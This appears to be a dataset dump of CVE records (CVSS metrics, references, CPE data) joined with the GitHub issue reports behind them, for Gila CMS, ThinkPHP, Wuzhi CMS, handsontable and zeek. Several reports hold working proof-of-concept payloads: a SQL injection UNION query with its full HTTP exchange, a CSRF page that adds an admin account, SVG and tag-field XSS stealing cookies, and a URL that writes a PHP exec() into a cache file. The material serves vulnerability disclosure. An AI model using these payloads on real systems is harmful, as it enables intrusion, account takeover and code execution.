$result['rows'][] = array_values($r); $result['startIndex'] = $pnk->startIndex($args); $result['totalRows'] = $pnk->totalRows($filters); return $result; } ``` **Vulnerability certificate** Visit http://[address]:[port]/[app_path]/cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THB, you can see that the returned content has the result of the sql statement execution is 123456789 Send get packet ``` GET /cm/list_rows/post?page=1&search=qww')+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('123','456'),'789')--+THBL HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Accept: */* Referer: http://192.168.0.103/admin/content/post Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=hmrt8hmf1v09krdr1p97f0sm93; GSESSIONID=1nnplwx30uiv7aiidh8tadishur4rta71nbxsuppk7w2szo2vh Connection: close ``` Response package ``` HTTP/1.1 200 OK Date: Sun, 13 Oct 2019 08:03:13 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a X-Powered-By: PHP/7.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: application/json Content-Length: 372 { "fields": [ "id", "thumbnail", "title", "user_id", "updated", "categories", "publish" ], "rows": [ [ null, null, null, null, null, null, "123456789" ] ], "startIndex": 0, "totalRows": null } ```
SQL injection in Gila CMS version 1.11.4
https://api.github.com/repos/GilaCMS/gila/issues/50/comments
1
2019-10-13T09:33:27Z
2019-10-20T21:06:26Z
https://github.com/GilaCMS/gila/issues/50
506,298,158
50
2,619
CVE-2020-20693
2021-09-27T22:15:07.563
A Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gilacms:gila_cms:1.11.4:*:*:*:*:*:*:*", "matchCriteriaId": "404DFD9F-C26A-47BB-8D9F-E3D06BA5DEA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/GilaCMS/gila/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GilaCMS", "gila" ]
**CSRF vulnerability** There is a CSRF vulnerability to add an administrator account After the administrator logged in, open the following page **poc** Hack.html-----add an administrator accoun ``` <html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; p.enctype ="multipart/form-data"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += "<input type='hidden' name='username' value='admin' />"; fields += "<input type='hidden' name='email' value='1620449914&#64;qq&#46;com' />"; fields += "<input type='hidden' name='pass' value='admin' />"; fields += "<input type='hidden' name='userrole&#91;&#93;' value='1' />"; fields += "<input type='hidden' name='active' value='1' />"; var url = "http://192.168.0.103/cm/update_rows/user"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html> ``` **Screenshots** 1 Access dangerous pages ![图片.png](https://i.loli.net/2019/10/14/aCTLjvktEnUDmdK.png) ![图片.png](https://i.loli.net/2019/10/14/Ew2NlTdDXe8xbct.png) 2 Found that an administrator has been added ![图片.png](https://i.loli.net/2019/10/14/QUkOIeMPTa3u2Vn.png) **Impact version** - Version [1.11.4]
There is a CSRF vulnerability that can add an administrator account
https://api.github.com/repos/GilaCMS/gila/issues/51/comments
0
2019-10-13T16:20:44Z
2019-10-20T21:06:38Z
https://github.com/GilaCMS/gila/issues/51
506,346,279
51
2,620
CVE-2020-20695
2021-09-27T22:15:07.603
A stored cross-site scripting (XSS) vulnerability in GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gilacms:gila_cms:1.11.4:*:*:*:*:*:*:*", "matchCriteriaId": "404DFD9F-C26A-47BB-8D9F-E3D06BA5DEA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GilaCMS/gila/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GilaCMS", "gila" ]
**Version impacted** v1.11.4 **Vulnerability details(POC)** The file with the suffix .svg saves the following code. After uploading to the server, you can execute any js code. If the ordinary user has permission to upload files, the administrator user accidentally accesses the malicious svg uploaded by the user, then the ordinary user. It is possible to obtain the cookie information of the administrator user, resulting in an increase in the rights of the ordinary user. It is dangerous for the system to allow uploading svg files. ``` <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert(document.cookie); </script> </svg> ``` ![图片.png](https://i.loli.net/2019/10/14/Qc17LW8fbH62TXN.png) Access the file and find that malicious code has been executed ![图片.png](https://i.loli.net/2019/10/14/YU1gbjQV437zDai.png) **Vulnerability related code** The media_uploadAction function in /src/core/controllers/admin.php allows uploading svg files ``` function media_uploadAction(){ if(!gForm::posted()) { echo "Permission denied."; exit; } if(isset($_FILES['uploadfiles'])) { if (isset($_FILES['uploadfiles']["error"])) if ($_FILES['uploadfiles']["error"] > 0) { echo "Error: " . $_FILES['uploadfiles']['error'] . "<br>"; } $path = router::post('path','assets'); if($path[0]=='.') $path='assets'; $tmp_file = $_FILES['uploadfiles']['tmp_name']; $name = htmlentities($_FILES['uploadfiles']['name']); if(in_array(pathinfo($name, PATHINFO_EXTENSION),["svg","jpg","JPG","jpeg","JPEG","png","PNG","gif","GIF"])) { $path = SITE_PATH.$path.'/'.$name; if(!move_uploaded_file($tmp_file, $path)) { echo "Error: could not upload file!<br>"; } $maxWidth = gila::config('maxImgWidth') ?? 0; $maxHeight = gila::config('maxImgHeight') ?? 0; if($maxWidth>0 && $maxHeight>0) { image::make_thumb($path, $path, $maxWidth, $maxHeight); } } else echo "<div class='alert error'>Error: not a media file!</div>"; } self::mediaAction(); } ``` **Repair suggestion** Remove svg files from the list
Storage type xss by uploading svg files
https://api.github.com/repos/GilaCMS/gila/issues/52/comments
1
2019-10-14T03:08:48Z
2020-05-01T16:58:08Z
https://github.com/GilaCMS/gila/issues/52
506,427,523
52
2,621
CVE-2020-20696
2021-09-27T22:15:07.643
A cross-site scripting (XSS) vulnerability in /admin/content/post of GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Tags field.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/GilaCMS/gila/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gilacms:gila_cms:1.11.4:*:*:*:*:*:*:*", "matchCriteriaId": "404DFD9F-C26A-47BB-8D9F-E3D06BA5DEA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GilaCMS/gila/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "GilaCMS", "gila" ]
*Gila CMS 1.11.4 version has xss vulnerability in the release of new posts* **System environment** The browser used is Firefox php7.3.4+apache2.4.39+mysql5.7.26 **Vulnerability verification step** Vulnerability verification step: 1 log in system 2 Select Posts->Post->new at the control panel 3 Edit the post and insert `"><svg/onload=alert(document.cookie)>` in the tags 4 Set the post to be public and post the post and then access the page **Vulnerability screenshot** ![图片.png](https://i.loli.net/2019/10/15/Mvm6jpl4aruLPVy.png) ![图片.png](https://i.loli.net/2019/10/15/yvfXeBqQx7cGsOg.png) **Repair opinion** Encoding the submitted content of the Tags content
[Security]Gila CMS v1.11.4 has xss vulnerability in the release of new posts
https://api.github.com/repos/GilaCMS/gila/issues/53/comments
0
2019-10-15T03:43:22Z
2019-10-20T21:07:43Z
https://github.com/GilaCMS/gila/issues/53
506,986,058
53
2,622
CVE-2020-20120
2021-09-28T23:15:07.007
ThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the "where" and "query" methods.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/thinkphp/issues/553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/thinkphp/issues/553" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*", "matchCriteriaId": "1D3CF42C-0ED9-4AC8-AAD3-8FE0CE653608", "versionEndExcluding": null, "versionEndIncluding": "3.2.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/top-think/thinkphp/issues/553
[ "Exploit", "Third Party Advisory" ]
github.com
[ "top-think", "thinkphp" ]
I found a lot of such code in our extensive penetration test. `$sql=$Data->query("select * from users where id=$id"); $sql=$Data->where("id=$id")->select();` Such code is not pre-processed by sql during preprocessing. can be seen `protected function parseSql($sql,$parse) { if(true === $parse) { $options = $this->_parseOptions(); $sql = $this->db->parseSql($sql,$options); }elseif(is_array($parse)){ // SQL预处理 $parse = array_map(array($this->db,'escapeString'),$parse); $sql = vsprintf($sql,$parse); }else{ $sql = strtr($sql,array('__TABLE__'=>$this->getTableName(),'__PREFIX__'=>C('DB_PREFIX'))); } $this->db->setModel($this->name); return $sql; }` or `public function where($where,$parse=null){ if(!is_null($parse) && is_string($where)) { if(!is_array($parse)) { $parse = func_get_args(); array_shift($parse); } $parse = array_map(array($this->db,'escapeString'),$parse); $where = vsprintf($where,$parse); }elseif(is_object($where)){ $where = get_object_vars($where); } if(is_string($where) && '' != $where){ $map = array(); $map['_string'] = $where; $where = $map; } if(isset($this->options['where'])){ $this->options['where'] = array_merge($this->options['where'],$where); }else{ $this->options['where'] = $where; } return $this; } ` And the official website also has a lot of such writings.http://www.thinkphp.cn/extend/246.html Are all wrong demonstrations that will cause more SQL injection Sql injection can also be performed in the MODEL.class.php limit function and the order function. `public function limit($offset,$length=null){ $this->options['limit'] = is_null($length)?$offset:$offset.','.$length; return $this; } $sql=$Data->where("id=$id")->order($id);`
SQL injection problem exists for multiple functions below version 5.0
https://api.github.com/repos/top-think/thinkphp/issues/553/comments
0
2019-08-23T09:39:22Z
2019-08-23T09:41:06Z
https://github.com/top-think/thinkphp/issues/553
484,433,930
553
2,623
CVE-2020-20124
2021-09-28T23:15:07.100
Wuzhi CMS v4.1.0 contains a remote code execution (RCE) vulnerability in \attachment\admin\index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4749403-9C42-40DF-A695-A9E31BD37D84", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/wuzhicms/wuzhicms/issues/188
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
1.In the set_cache method of the \coreframe\app\core\libs\function\common.func.php file, when $data is not of the array type, $data will be written directly to the php file. ``` function set_cache($filename, $data, $dir = '_cache_'){ static $_dirs; if ($dir == '') return FALSE; if (!preg_match('/([a-z0-9_]+)/i', $filename)) return FALSE; $cache_path = CACHE_ROOT . $dir . '/'; if (!isset($_dirs[$filename . $dir])) { if (!is_dir($cache_path)) { mkdir($cache_path, 0777, true); } $_dirs[$filename . $dir] = 1; } $filename = $cache_path . $filename . '.' . CACHE_EXT . '.php'; if (is_array($data)) { $data = '<?php' . "\r\n return " . array2string($data) . '?>'; } file_put_contents($filename, $data); } ``` 2. The set_cache method is called in the set method of the \coreframe\app\attachment\admin\index.php file, and $GLOBALS['setting'] has not been filtered,so anything can be written to the php file. ``` public function set() { if (isset($GLOBALS['submit'])) { set_cache(M, $GLOBALS['setting']); MSG(L('operation_success'), HTTP_REFERER, 3000); } else { $show_dialog = 1; load_class('form'); $setting = &$this->_cache; if(!isset($setting['show_mode'])) { $setting = array('show_mode'=>2,'watermark_enable'=>1,'watermark_pos'=>0,'watermark_text'=>'www.wuzhicms.com'); set_cache(M, $setting); } include $this->template('set', M); } } ``` 3. Finally, on line 21 of \coreframe\app\attachment\admin\index.php, a php file that can write arbitrary content will be loaded. ` $this->_cache = get_cache(M);` poc: 1.Login background 2.Visit http://127.0.0.1/index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=<?php echo exec("whoami");?> 3.Visit again ![image](https://user-images.githubusercontent.com/29322812/69037223-736e5d80-0a22-11ea-88ef-fe57ec0a92f5.png)
Remote Code Execution Vulnerability In WUZHI CMS v4.1.0
https://api.github.com/repos/wuzhicms/wuzhicms/issues/188/comments
1
2019-11-18T08:42:58Z
2019-11-18T08:47:49Z
https://github.com/wuzhicms/wuzhicms/issues/188
524,216,791
188
2,624
CVE-2021-23446
2021-09-29T17:15:06.987
The package handsontable before 10.0.0; the package handsontable from 0 and before 10.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) in Handsontable.helper.isNumeric function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/handsontable/handsontable/issues/8752" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/handsontable/handsontable/pull/8742" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-DOTNET-HANDSONTABLE-1726793" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1726795" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1726796" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBHANDSONTABLE-1726794" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1726797" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-HANDSONTABLE-1726770" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/handsontable/handsontable/issues/8752" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/handsontable/handsontable/pull/8742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-DOTNET-HANDSONTABLE-1726793" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1726795" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1726796" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBHANDSONTABLE-1726794" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1726797" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-HANDSONTABLE-1726770" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:handsontable:handsontable:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "12530248-851C-4F16-B015-648DEFF210C4", "versionEndExcluding": "10.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/handsontable/handsontable/issues/8752
[ "Third Party Advisory" ]
github.com
[ "handsontable", "handsontable" ]
### Description <!--- Tell us what happens and what should happen --> As the title says the issue is about fixing regular expression vulnerability found in the helper that checks if the value is a numeric value and implementing a GHA workflow with Code Quality tool that requires clean up major code smells. ### Your environment * Handsontable version: - * Browser Name and version: - * Operating System: -
Fix RegExp vulnerability and clean up major code smells
https://api.github.com/repos/handsontable/handsontable/issues/8752/comments
1
2021-09-27T08:57:20Z
2021-09-29T09:25:06Z
https://github.com/handsontable/handsontable/issues/8752
1,007,881,158
8,752
2,625
CVE-2021-41732
2021-09-29T19:15:07.917
An issue was discovered in zeek version 4.1.0. There is a HTTP request splitting vulnerability that will invalidate any ZEEK HTTP based security analysis. NOTE: the vendor's position is that the observed behavior is intended
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zeek/zeek/issues/1798" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zeek/zeek/issues/1798" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zeek:zeek:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C58F6E91-E7CA-4B00-AAAC-83ECFE8C96D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/zeek/zeek/issues/1798
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zeek", "zeek" ]
